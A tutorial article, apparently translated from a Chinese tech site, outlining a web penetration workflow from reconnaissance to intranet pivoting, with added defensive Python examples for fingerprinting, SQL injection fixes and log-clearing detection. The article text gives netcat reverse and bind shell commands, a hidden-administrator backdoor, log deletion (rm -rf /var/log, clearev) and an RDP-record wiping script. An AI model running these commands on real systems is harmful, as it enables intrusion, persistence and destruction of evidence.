2025-03-26 Update. From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 05/31 Report
Many inexperienced people do not know how to approach Web penetration analysis, so this article summarizes the process and how to carry it out. I hope it helps you solve this problem.
Web penetration testing is divided into white-box testing and black-box testing. White-box testing means penetrating with the target website's source code and other information in hand, which amounts to code analysis and auditing. Black-box testing means penetrating without any knowledge of the website's system; the Web penetration discussed below is black-box penetration. Web penetration consists of the following steps: information gathering, vulnerability scanning, vulnerability exploitation, privilege escalation, intranet penetration, leaving a backdoor, and cleaning up traces. The general line of thinking is: check for an injection vulnerability, inject to obtain the back-end administrator's account and password, log in to the back end, upload a small webshell (小马), use it to upload a larger webshell (大马), escalate privileges, forward ports into the intranet, and carry out intranet penetration: scan the intranet's C-class segment for live hosts and open ports (nmap), check whether those hosts have exploitable vulnerabilities (nessus) or vulnerable services on those ports, and exploit them (msf) to take over the intranet. Then leave a backdoor and clear your traces. Alternatively, look for a file upload feature, upload a one-line webshell (一句话木马), connect to it with China Chopper (中国菜刀), get at the database and execute cmd commands, and from there go on to a larger webshell. There are many approaches; whether you succeed is often a matter of thinking rather than technique: the technique need not be advanced, but the ideas must be clever.
Information gathering is the top priority of the whole process: the more information is gathered up front, the higher the success rate of the Web penetration. DNS and domain information: the real IP, subdomains (Layer subdomain enumerator), neighbouring sites on the same server (K8 side-site tool, Yujian 1.5), the C-class segment, and the site owner and their details (whois lookup). Whole-site information: server operating system, web server type and version (Apache/Nginx/Tomcat/IIS), database type (MySQL/Oracle/Access/SQL Server), script language (php/jsp/asp/aspx), and CMS type. Common stack pairings are: ASP and ASPX with Access or SQL Server; PHP with MySQL or PostgreSQL; JSP with Oracle or MySQL. Sensitive directory information (Yujian, DirBuster) and open port information (nmap).
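As an added example (not from the article), the following Python shows what the whole-site fingerprinting step above can read straight from a server's own response headers and default session cookie names; the same output doubles as the checklist of headers a defender should strip or neutralise. The two sample responses are constructed, and parse_headers, fingerprint and COOKIE_HINTS are names chosen here for the demonstration.

```python
"""Passive stack fingerprinting from HTTP response headers.

Added example (not from the original article). Shows what the
"whole-site information" step learns from a server's own response,
which doubles as a checklist of the headers and cookie names a
defender should strip or rename. All sample responses are constructed.
"""
import re

# Constructed response from an unhardened deployment.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/; HttpOnly\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

# Constructed response after hardening: generic Server value, no
# X-Powered-By, renamed session cookie.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: sid=abc123; path=/; HttpOnly\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

# Default session cookie name prefixes and the script engine they imply.
COOKIE_HINTS = {
    "PHPSESSID": "php",
    "JSESSIONID": "jsp",
    "ASP.NET_SessionId": "aspx",
    "ASPSESSIONID": "asp",   # real names carry a random suffix
}

VERSION_RE = re.compile(r"\d+(?:\.\d+)+")


def parse_headers(raw):
    """Split a raw HTTP response into (status line, header dict).

    Names are lower-cased; values are kept in lists so repeated
    headers such as Set-Cookie are not lost.
    """
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def fingerprint(headers):
    """Report what the headers disclose and which header leaked it."""
    findings = {"server": None, "server_version": None,
                "language": None, "leaks": []}
    for server in headers.get("server", []):
        findings["server"] = server.split("/", 1)[0].strip()
        match = VERSION_RE.search(server)
        if match:
            findings["server_version"] = match.group(0)
            findings["leaks"].append("Server header exposes version")
    for powered in headers.get("x-powered-by", []):
        findings["language"] = powered.split("/", 1)[0].strip().lower()
        findings["leaks"].append("X-Powered-By header present")
    for cookie in headers.get("set-cookie", []):
        name = cookie.split("=", 1)[0].strip()
        for prefix, lang in COOKIE_HINTS.items():
            if name.startswith(prefix):
                findings["language"] = findings["language"] or lang
                findings["leaks"].append(f"default session cookie name {name}")
                break
    return findings


if __name__ == "__main__":
    for label, raw in (("unhardened", SAMPLE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        _status, hdrs = parse_headers(raw)
        print(label, fingerprint(hdrs))
```

Run against the hardened response the leak list is empty and the language stays unknown, which is the state to aim for with ServerTokens/ServerSignature, expose_php and a renamed session cookie; the server family itself usually still shows, so this reduces precision rather than hiding the stack entirely.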
Vulnerability scanning uses AWVS, AppScan, OWASP ZAP and similar tools to make a preliminary scan of the website for exploitable vulnerabilities. Common vulnerabilities: SQL injection; XSS (cross-site scripting); CSRF (cross-site request forgery); XXE (XML external entity injection); SSRF (server-side request forgery); file inclusion; file upload; file parsing; remote code execution; CORS (cross-origin resource sharing) misconfiguration; unauthorized access; directory traversal; and arbitrary file read/download.
Vulnerability exploitation: use tools or manual methods to exploit the corresponding vulnerabilities, for example SQL injection (sqlmap), XSS (BeEF), back-end password brute forcing (Burp), and port/service brute forcing (hydra).
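To make the first item concrete from the defender's side, here is an added Python example (not the article's code) of the kind of login query that SQL injection abuses beside its parameterised fix, run against a constructed in-memory SQLite table; login_vulnerable, login_safe and looks_like_injection are hypothetical names chosen for the demonstration, and the sample accounts are constructed.

```python
"""SQL injection in a login check, and the parameterised fix.

Added example, not code from the article. login_vulnerable() and
login_safe() are hypothetical stand-ins for a web login handler before
and after the fix, run against a constructed in-memory SQLite table.
Passwords are stored in clear only to keep the demonstration short;
a real handler stores a salted hash.
"""
import re
import sqlite3

# Constructed sample accounts.
SAMPLE_USERS = [
    ("admin", "s3cret-admin-pw", "admin"),
    ("alice", "alice-pw", "user"),
]


def make_db():
    """Create a throwaway users table populated with SAMPLE_USERS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: the input is parsed as SQL, so a quote in
    the password rewrites the WHERE clause. Returns (username, role)
    or None."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Parameterised query: the driver binds the input as a value, so
    the same payload is compared literally and matches nothing."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# Triage heuristic for access logs or a WAF: quote followed by a boolean
# operator, or an SQL comment sequence, inside a login field. This is a
# detection aid, not a defence; parameterisation is the fix.
INJECTION_RE = re.compile(r"'\s*(?:or|and)\b|--|/\*|;\s*\w", re.IGNORECASE)


def looks_like_injection(value):
    """True if a submitted field carries a classic injection pattern."""
    return bool(INJECTION_RE.search(value))


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(db, "admin", payload))
    print("safe:      ", login_safe(db, "admin", payload))
```

The vulnerable function returns the admin row for a password it never checked, because the tautology turns the WHERE clause into "anything OR true"; the safe function gets None for the same input. The heuristic at the end is what a scanner's probes look like in a log, which is useful for spotting the scanning phase even on an application that is already parameterised.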
The privileges we have after getting a shell may be very low. To escalate, use an exploit (exp) matching the server's version, or, on a Windows system, an exploit for a vulnerability whose patch is missing from the system.
Intranet penetration starts with port forwarding; nc can be used. Reverse connection: listen on the public-network host with nc -lvp 4444 and run nc -e cmd.exe <public host ip> 4444 on the intranet host; on success you get a shell on the intranet host. Forward (bind) connection: run nc -l -p 4444 -t -e cmd.exe on the remote host and nc -vv <remote host ip> 4444 on the local host; on success the local host gets a shell on the remote host. Then penetrate the intranet: use a host vulnerability scanner (nessus, X-Scan, etc.) to find exploitable vulnerabilities and msf to exploit them, or use nmap to scan for live hosts and open ports, then use hydra to brute-force a port or the msf module for that port's vulnerability to get a shell, take down the intranet and leave a backdoor.
Leaving a backdoor: for the website, upload a one-line webshell. For Windows users, hideadmin can create a super-hidden account. Manually: net user test$ 123456 /add, then net localgroup administrators test$ /add. An account named like this is not shown by the net user command, but it is still visible in Control Panel; hiding it there as well requires registry changes, which is too fiddly to go into here, so a tool saves the trouble.
Trace cleanup. Log cleanup: in a Windows environment, clean up with msf; the commands are run clearlogs and clearev. In a Linux environment: rm -rf /var/log deletes the /var/log files, and export HISTSIZE=0 clears the command history the bash shell saves (the last 500 commands by default). Clearing the 3389 remote login records:
@echo off
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
@del "%USERPROFILE%\My Documents\Default.rdp" /a
@exit
Try to use a proxy during penetration so as not to expose your IP easily. As for me, I am also a newcomer who has only just entered the security circle; the above is a summary of the penetration process from my studies. Experts, please go easy on me; I hope it helps information security enthusiasts who are just getting started.
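For the hidden-account backdoor and the trace-cleaning steps in the two paragraphs above, here is an added Python example (not from the article) of the defender's side: a scan of constructed Windows Security/System event records for $-suffixed local accounts being created and added to Administrators, and for the 1102/104 log-cleared events, plus a check of a shell startup file for the HISTSIZE=0 trick. Field names follow the Windows event schema but are simplified (in real 4732 events the member is usually identified by SID rather than name), parse_events, detect and bash_history_disabled are names chosen here, and all sample data is constructed.

```python
"""Detecting the hidden-account backdoor and log clearing described above.

Added example, not from the article. Scans constructed Windows
Security/System event records (JSON lines; field names follow the
Windows event schema but are simplified, and in real 4732 events the
member is usually identified by SID rather than name) and a constructed
shell startup file. All sample data is constructed.
"""
import json
import re

# Constructed events: a web service account creates test$, adds it to
# Administrators, then the Security and System logs are cleared.
SAMPLE_EVENTS = """
{"EventID": 4624, "Computer": "WEB01", "TargetUserName": "alice"}
{"EventID": 4720, "Computer": "WEB01", "SubjectUserName": "www-svc", "TargetUserName": "test$"}
{"EventID": 4732, "Computer": "WEB01", "SubjectUserName": "www-svc", "MemberName": "test$", "TargetUserName": "Administrators"}
{"EventID": 1102, "Computer": "WEB01", "SubjectUserName": "test$", "Channel": "Security"}
{"EventID": 104, "Computer": "WEB01", "SubjectUserName": "test$", "Channel": "System"}
{"EventID": 4720, "Computer": "WEB02", "SubjectUserName": "itadmin", "TargetUserName": "newhire"}
"""

# Constructed .bashrc fragment with the history-disabling trick.
SAMPLE_BASHRC = "alias ll='ls -l'\nexport HISTSIZE=0\n"

HISTORY_OFF_RE = re.compile(
    r"^\s*(?:export\s+)?(?:HISTSIZE|HISTFILESIZE)\s*=\s*0\s*$"
    r"|^\s*unset\s+HISTFILE\b",
    re.MULTILINE,
)


def parse_events(text):
    """Parse one JSON event per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events):
    """Return (alert, computer, subject) tuples for the indicators.

    4720 with a '$'-suffixed name: the net user listing hides such
    accounts, so creation is the moment to catch it.
    4732 into Administrators: any change is worth review; a '$' member
    is rated higher.
    1102 (Security log cleared) and 104 (System log cleared) are
    written into the freshly cleared log, so a clearev-style wipe
    leaves its own record; forward the logs so a wipe cannot hide it.
    """
    alerts = []
    for e in events:
        eid = e.get("EventID")
        target = e.get("TargetUserName", "")
        if eid == 4720 and target.endswith("$"):
            alerts.append(("hidden_account_created", e["Computer"], target))
        elif eid == 4732 and target.lower() == "administrators":
            member = e.get("MemberName", "")
            kind = "hidden_admin_added" if member.endswith("$") else "admin_group_change"
            alerts.append((kind, e["Computer"], member))
        elif eid == 1102 or (eid == 104 and e.get("Channel") == "System"):
            alerts.append(("log_cleared", e["Computer"], e.get("SubjectUserName", "")))
    return alerts


def bash_history_disabled(startup_file_text):
    """True if a shell startup file turns off bash history."""
    return bool(HISTORY_OFF_RE.search(startup_file_text))


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(*alert)
    print("history disabled:", bash_history_disabled(SAMPLE_BASHRC))
```

On the sample the detector fires four times for WEB01 and stays quiet for the ordinary account creation on WEB02. The rm -rf /var/log step has no equivalent event on Linux, which is the argument for shipping syslog and auth logs off the host as they are written rather than relying on what is left on disk.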
Related exercise, a comprehensive penetration scenario: use what you have learned to penetration-test the target, obtain permissions on the target system and thereby its sensitive information. If you manage that, congratulations: you have made the transition from security rookie to penetration testing engineer.
After reading the above, have you mastered the approach to Web penetration analysis? If you want to learn more skills or find out more, follow the industry information channel. Thank you for reading!